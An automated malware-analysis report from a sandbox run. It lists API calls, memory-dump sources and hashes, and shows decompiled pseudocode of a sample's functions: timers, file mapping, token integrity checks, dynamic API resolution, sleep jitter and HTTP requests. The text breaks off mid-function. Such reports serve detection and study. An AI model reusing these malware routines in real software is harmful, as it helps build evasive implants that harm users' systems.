0x02ceadfd
0x02ceae03
0x02ceae05
0x02ceae05
0x02ceadf8
0x02ceadea
0x00000000
0x02ceade4
0x02cead9d
0x02ceada0
0x02ceada7
0x02ceadb7
0x02ceadba
0x02ceadca
0x00000000
0x02ceadd0
0x02ceadb1
0x02ceadb5
0x00000000
0x00000000
0x00000000
0x02ceadb5
0x02cead82
0x02cead86
0x00000000
0x00000000
0x00000000
0x02cead86
0x02cead5f
0x02cead63
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02CEAD0E
LoadLibraryA.KERNEL32(?), ref: 02CEAD8B
GetLastError.KERNEL32 ref: 02CEAD97
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 02CEADCA

Strings

$, xrefs: 02CEACE3

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: 4dd47e0e1445a8a7370b4230c5f37a2e88502a21d38b8fc360cf39632ce1f63d
Instruction ID: 31f344fcebdd53e17289328255aacd6701354ca391fbe0c336587fe63faa1f18
Opcode Fuzzy Hash: 4dd47e0e1445a8a7370b4230c5f37a2e88502a21d38b8fc360cf39632ce1f63d
Instruction Fuzzy Hash: CD813B75A40205EFDF20DF99D880BAEB7F5EF88314F148529E956EB240EB70EA15CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02CE7C3D, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E02CE7C3D(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x2ced240);
					_v20 = 0;
					_v16 = 0;
					L02CEAF6E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x2ced26c; // 0x2c0
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x2ced24c = 5;
						} else {
							_t68 = E02CE5319(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x2ced260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E02CE2C58(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E02CE9870(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x2ced244);
							goto L21;
						} else {
							__eflags =  *0x2ced248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E02CE5433();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x2ced248);
								L21:
								L02CEAF6E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x2ced238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x02ce7c3d
0x02ce7c4f
0x02ce7c52
0x02ce7c5e
0x02ce7c64
0x02ce7c69
0x02ce7dd0
0x02ce7c6f
0x02ce7c6f
0x02ce7c71
0x02ce7c76
0x02ce7c77
0x02ce7c7d
0x02ce7c80
0x02ce7c83
0x02ce7c91
0x02ce7c9c
0x02ce7c9f
0x02ce7ca1
0x02ce7cae
0x02ce7cb8
0x02ce7cba
0x02ce7cbf
0x02ce7cc4
0x02ce7ccf
0x02ce7ccf
0x02ce7cc6
0x02ce7cc6
0x02ce7ccd
0x00000000
0x00000000
0x02ce7ccd
0x02ce7cd9
0x00000000
0x02ce7cdc
0x02ce7ce0
0x02ce7ceb
0x02ce7ceb
0x02ce7cf2
0x02ce7cfb
0x02ce7d02
0x02ce7d0b
0x02ce7d0e
0x02ce7d11
0x02ce7d16
0x02ce7d1b
0x00000000
0x00000000
0x02ce7d1d
0x02ce7d20
0x02ce7d23
0x02ce7d26
0x00000000
0x02ce7d28
0x02ce7d37
0x02ce7d37
0x00000000
0x02ce7d65
0x02ce7d65
0x02ce7d6a
0x02ce7d89
0x02ce7d8b
0x02ce7d90
0x02ce7d91
0x00000000
0x02ce7d6c
0x02ce7d6c
0x02ce7d72
0x00000000
0x02ce7d74
0x02ce7d74
0x02ce7d79
0x02ce7d7b
0x02ce7d80
0x02ce7d81
0x02ce7d97
0x02ce7d97
0x02ce7d9f
0x02ce7daa
0x02ce7dad
0x02ce7db8
0x02ce7dba
0x02ce7dbd
0x02ce7dbf
0x00000000
0x02ce7dc5
0x00000000
0x02ce7dc5
0x02ce7dbf
0x02ce7d72
0x00000000
0x02ce7d6a
0x02ce7d3a
0x02ce7d3c
0x02ce7d3f
0x02ce7d40
0x02ce7d40
0x02ce7d44
0x02ce7d4e
0x02ce7d4e
0x02ce7d54
0x02ce7d57
0x02ce7d57
0x02ce7d5d
0x02ce7d5d
0x02ce7dda
0x00000000

APIs

memset.NTDLL ref: 02CE7C52
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02CE7C5E
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 02CE7C83
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 02CE7C9F
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02CE7CB8
HeapFree.KERNEL32(00000000,00000000), ref: 02CE7D4E
CloseHandle.KERNEL32(?), ref: 02CE7D5D
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02CE7D97
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,02CE312C,?), ref: 02CE7DAD
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02CE7DB8

Part of subcall function 02CE5319: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03BA9368,00000000,?,76D7F710,00000000,76D7F730), ref: 02CE5368
Part of subcall function 02CE5319: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,03BA93A0,?,00000000,30314549,00000014,004F0053,03BA935C), ref: 02CE5405
Part of subcall function 02CE5319: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02CE7CCB), ref: 02CE5417

GetLastError.KERNEL32 ref: 02CE7DCA

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 6eb3d081ec9bb4241dfb4492a2aaff3a2c7a291d5616fd4e459d146616db9f4f
Instruction ID: a6a5d7c0d5b1c716562e2866e40c48bc0378e9817cc7b1e19959b79748964ecf
Opcode Fuzzy Hash: 6eb3d081ec9bb4241dfb4492a2aaff3a2c7a291d5616fd4e459d146616db9f4f
Instruction Fuzzy Hash: BB5149B1801228EADF20DF95DC44AEEBBB9EF89724F104616F816A6190D7708B54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02CE8E0D, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02CE8E0D(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L02CEAF68();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x2ced2a8; // 0xeba5a8
				_t5 = _t13 + 0x2cee87e; // 0x3ba8e26
				_t6 = _t13 + 0x2cee59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L02CEAC0A();
				_t17 = CreateFileMappingW(0xffffffff, 0x2ced2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x02ce8e0d
0x02ce8e15
0x02ce8e19
0x02ce8e1f
0x02ce8e24
0x02ce8e29
0x02ce8e2c
0x02ce8e2f
0x02ce8e34
0x02ce8e35
0x02ce8e38
0x02ce8e3d
0x02ce8e44
0x02ce8e4e
0x02ce8e50
0x02ce8e51
0x02ce8e54
0x02ce8e70
0x02ce8e76
0x02ce8e7a
0x02ce8ec8
0x02ce8e7c
0x02ce8e89
0x02ce8e99
0x02ce8ea1
0x02ce8eb3
0x02ce8eb7
0x00000000
0x00000000
0x02ce8ea3
0x02ce8ea6
0x02ce8eab
0x02ce8ead
0x02ce8ead
0x02ce8e8b
0x02ce8e8d
0x02ce8eb9
0x02ce8eba
0x02ce8eba
0x02ce8e89
0x02ce8ecf

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02CE2FFF,?,?,4D283A53,?,?), ref: 02CE8E19
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02CE8E2F
_snwprintf.NTDLL ref: 02CE8E54
CreateFileMappingW.KERNELBASE(000000FF,02CED2AC,00000004,00000000,00001000,?), ref: 02CE8E70
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02CE2FFF,?,?,4D283A53), ref: 02CE8E82
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 02CE8E99
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02CE2FFF,?,?), ref: 02CE8EBA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02CE2FFF,?,?,4D283A53), ref: 02CE8EC2

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 5882ccc448b52f30da254dc80fe4ca134045b0707fdaef626e8f2223c6738ab0
Instruction ID: 17f6412f7b5c49b89a354af4912f19794dc981053f13021546675278ffcb9504
Opcode Fuzzy Hash: 5882ccc448b52f30da254dc80fe4ca134045b0707fdaef626e8f2223c6738ab0
Instruction Fuzzy Hash: 6221A2B6A80244FBDF21FBA4CC05F9E77A9AB84750F150221FA16EB1D0D7709B04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001BF3E0, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 194networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000), ref: 001BF41D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF), ref: 001BF489
WSAStringToAddressW.WS2_32(?,?,00000000,?,00000080), ref: 001BF4A6
WSAGetLastError.WS2_32(?,?,00000000,?,00000080), ref: 001BF4AE

Strings

255.255.255.255, xrefs: 001BF4F9
&', xrefs: 001BF579
PkH, xrefs: 001BF44D, 001BF4D6, 001BF596

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ErrorLast$AddressByteCharMultiStringWide
String ID: &'$255.255.255.255$PkH
API String ID: 1649291596-3172548371
Opcode ID: 4a31b7eb36a07386bcdc731d357a1ad7be9935955bdcbd491dad39132ae89fde
Instruction ID: aa7a598f894bd7483ece818071a2d84a680d263648c1b9e9f49b4c9ba2dcc8e2
Opcode Fuzzy Hash: 4a31b7eb36a07386bcdc731d357a1ad7be9935955bdcbd491dad39132ae89fde
Instruction Fuzzy Hash: 5A818270A00214CFCF358F28CC94B9ABBB5AF55320F1486EDE89D9B291D7319D86CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02CEA2C6, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02CEA2C6(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x2ced25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E02CE1525(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E02CE8B22(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x02cea2d3
0x02cea2da
0x02cea2e1
0x02cea2f5
0x02cea300
0x02cea318
0x02cea325
0x02cea328
0x02cea32d
0x02cea338
0x02cea33c
0x02cea34b
0x02cea34f
0x02cea36b
0x02cea36b
0x02cea36f
0x02cea36f
0x02cea374
0x02cea378
0x02cea37e
0x02cea37f
0x02cea386
0x02cea38c

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02CEA2F8
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02CEA318
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02CEA328
CloseHandle.KERNEL32(00000000), ref: 02CEA378

Part of subcall function 02CE1525: RtlAllocateHeap.NTDLL(00000000,00000000,02CE1278), ref: 02CE1531

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02CEA34B
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02CEA353
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02CEA363

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 0b421f4d106b0e4abf8bf1c38605cf3044f6e2c47f9e43d4ac3b9aea21dc216a
Instruction ID: 2e985be1f9184d84a7c62e212126328271dca5e51d19a37cb381764c51ef6cb7
Opcode Fuzzy Hash: 0b421f4d106b0e4abf8bf1c38605cf3044f6e2c47f9e43d4ac3b9aea21dc216a
Instruction Fuzzy Hash: 51212875900208FFEF009FA4DC44EAEBBB9EB48314F1001A6E512A62A0D7719B55EF60

Uniqueness

Uniqueness Score: -1.00%

Function 001A1000, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001A1000(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E001A16EE(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x1a3104 + 0x1a4014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x1a3104 + 0x1a4151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E001A17CB(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x1a3104 + 0x1a4161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x1a3104 + 0x1a4174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x1a3104 + 0x1a4189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x1a3104 + 0x1a419f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E001A1C90(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x001a100e
0x001a1012
0x001a10d3
0x001a1018
0x001a1030
0x001a103f
0x001a1046
0x001a1048
0x001a104d
0x001a10cb
0x001a10cc
0x001a104f
0x001a105c
0x001a105e
0x001a1063
0x00000000
0x001a1065
0x001a1072
0x001a1074
0x001a1079
0x00000000
0x001a107b
0x001a1088
0x001a108a
0x001a108f
0x00000000
0x001a1091
0x001a109e
0x001a10a0
0x001a10a5
0x00000000
0x001a10a7
0x001a10ad
0x001a10b3
0x001a10b8
0x001a10bd
0x001a10c2
0x00000000
0x001a10c4
0x001a10c7
0x001a10c7
0x001a10c2
0x001a10a5
0x001a108f
0x001a1079
0x001a1063
0x001a104d
0x001a10e1

APIs

Part of subcall function 001A16EE: HeapAlloc.KERNEL32(00000000,?,001A19CF,00000030,?,00000000), ref: 001A16FA

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,001A1DBA,?,?,?,?,?,00000002,?,?), ref: 001A1024
GetProcAddress.KERNEL32(00000000,?), ref: 001A1046
GetProcAddress.KERNEL32(00000000,?), ref: 001A105C
GetProcAddress.KERNEL32(00000000,?), ref: 001A1072
GetProcAddress.KERNEL32(00000000,?), ref: 001A1088
GetProcAddress.KERNEL32(00000000,?), ref: 001A109E

Part of subcall function 001A1C90: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D24EE0,00000000,00000000,?), ref: 001A1CED
Part of subcall function 001A1C90: memset.NTDLL ref: 001A1D0F

Memory Dump Source

Source File: 00000011.00000002.525816570.00000000001A1000.00000040.00020000.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000011.00000002.525798200.00000000001A0000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.525835370.00000000001A4000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.525846743.00000000001A6000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 89ed5dd09b85cfa7546be0deb351bfbbd638241991ab9313589fcc0ef1aa355b
Instruction ID: acf2acb1e2c65aa4ded1fd045fab86527549e7d1fa4eff8d9a5576b2634decb5
Opcode Fuzzy Hash: 89ed5dd09b85cfa7546be0deb351bfbbd638241991ab9313589fcc0ef1aa355b
Instruction Fuzzy Hash: CF2178B470070AAFC710DF6ACA80D6BBBECEB56350B100465F409C7611EB70EA848F60

Uniqueness

Uniqueness Score: -1.00%

Function 02CE2789, Relevance: 9.1, APIs: 6, Instructions: 61
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02CE2789(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x2ced238 = _t10;
				if(_t10 != 0) {
					 *0x2ced1a8 = GetTickCount();
					_t12 = E02CE9EBB(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L02CEB0CA();
							_t34 = _t14 + _t16;
							_t18 = E02CE122B(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E02CE4D4D(_t26) != 0) {
							 *0x2ced260 = 1; // executed
						}
						_t12 = E02CE2F70(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x02ce2789
0x02ce278f
0x02ce2790
0x02ce279c
0x02ce27a2
0x02ce27a9
0x02ce27b9
0x02ce27be
0x02ce27c5
0x02ce27c7
0x02ce27cc
0x02ce27d2
0x02ce27d8
0x02ce27e2
0x02ce27e6
0x02ce27e8
0x02ce27ed
0x02ce27ee
0x02ce27ef
0x02ce27f4
0x02ce27fa
0x02ce2805
0x02ce2806
0x02ce280c
0x02ce2812
0x02ce281e
0x02ce2820
0x02ce2820
0x02ce282a
0x02ce282a
0x02ce27ab
0x02ce27ad
0x02ce27ad
0x02ce2834

APIs

HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,02CE7F25,?), ref: 02CE279C
GetTickCount.KERNEL32 ref: 02CE27B0
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,02CE7F25,?), ref: 02CE27CC
SwitchToThread.KERNEL32(?,00000001,?,?,?,02CE7F25,?), ref: 02CE27D2
_aullrem.NTDLL(?,?,00000013,00000000), ref: 02CE27EF
Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,02CE7F25,?), ref: 02CE280C

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID:
API String ID: 507476733-0
Opcode ID: 4cd55afd14d31c18af441b62c1482d75a90ba5611dfe07cc509b1216a0e25435
Instruction ID: 6391bc59d7d5c875ec310e5968544da21f7a36e5782dc286cfbff072c30e0b29
Opcode Fuzzy Hash: 4cd55afd14d31c18af441b62c1482d75a90ba5611dfe07cc509b1216a0e25435
Instruction Fuzzy Hash: 43118673A80204ABDF246B64DC19B5A769DEB44354F004A25FD17CB180EBB0DA508AA1

Uniqueness

Uniqueness Score: -1.00%

Function 02CE97F7, Relevance: 9.0, APIs: 6, Instructions: 45
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02CE97F7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E02CE8CFA(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E02CEA85C(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x02ce97f7
0x02ce9804
0x02ce9806
0x02ce9869
0x00000000
0x02ce9869
0x02ce981e
0x02ce9825
0x02ce9831
0x02ce9836
0x02ce984c
0x02ce985c
0x00000000
0x02ce984e
0x02ce984e
0x02ce9855
0x02ce9862
0x02ce9862
0x02ce9862
0x02ce9855
0x02ce984c
0x02ce9867
0x00000000
0x00000000
0x02ce986d

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,02CE937B,?,?,00000000,00000000), ref: 02CE9831
ResetEvent.KERNEL32(?), ref: 02CE9836
HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 02CE9843
GetLastError.KERNEL32 ref: 02CE984E
GetLastError.KERNEL32(?,?,00000102,02CE937B,?,?,00000000,00000000), ref: 02CE9869

Part of subcall function 02CE8CFA: lstrlen.KERNEL32(00000000,00000008,?,76D24D40,?,?,02CE9816,?,?,?,?,00000102,02CE937B,?,?,00000000), ref: 02CE8D06
Part of subcall function 02CE8CFA: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02CE9816,?,?,?,?,00000102,02CE937B,?), ref: 02CE8D64
Part of subcall function 02CE8CFA: lstrcpy.KERNEL32(00000000,00000000), ref: 02CE8D74

SetEvent.KERNEL32(?), ref: 02CE985C

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
String ID:
API String ID: 3739416942-0
Opcode ID: 9ec1b5bad1de61942d09505078d1f391aefc425a2495f137833664330ae2c09c
Instruction ID: e6b4e93f215e892dfbe8325abd7fbeb1bedd07e07dba062b85c2930f8b24a37d
Opcode Fuzzy Hash: 9ec1b5bad1de61942d09505078d1f391aefc425a2495f137833664330ae2c09c
Instruction Fuzzy Hash: C0016D32100700ABDF316B72DC44F1BBAA9AF88368F104B25F563990F1D731D915EAA1

Uniqueness

Uniqueness Score: -1.00%

Function 02CE2F70, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E02CE2F70(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
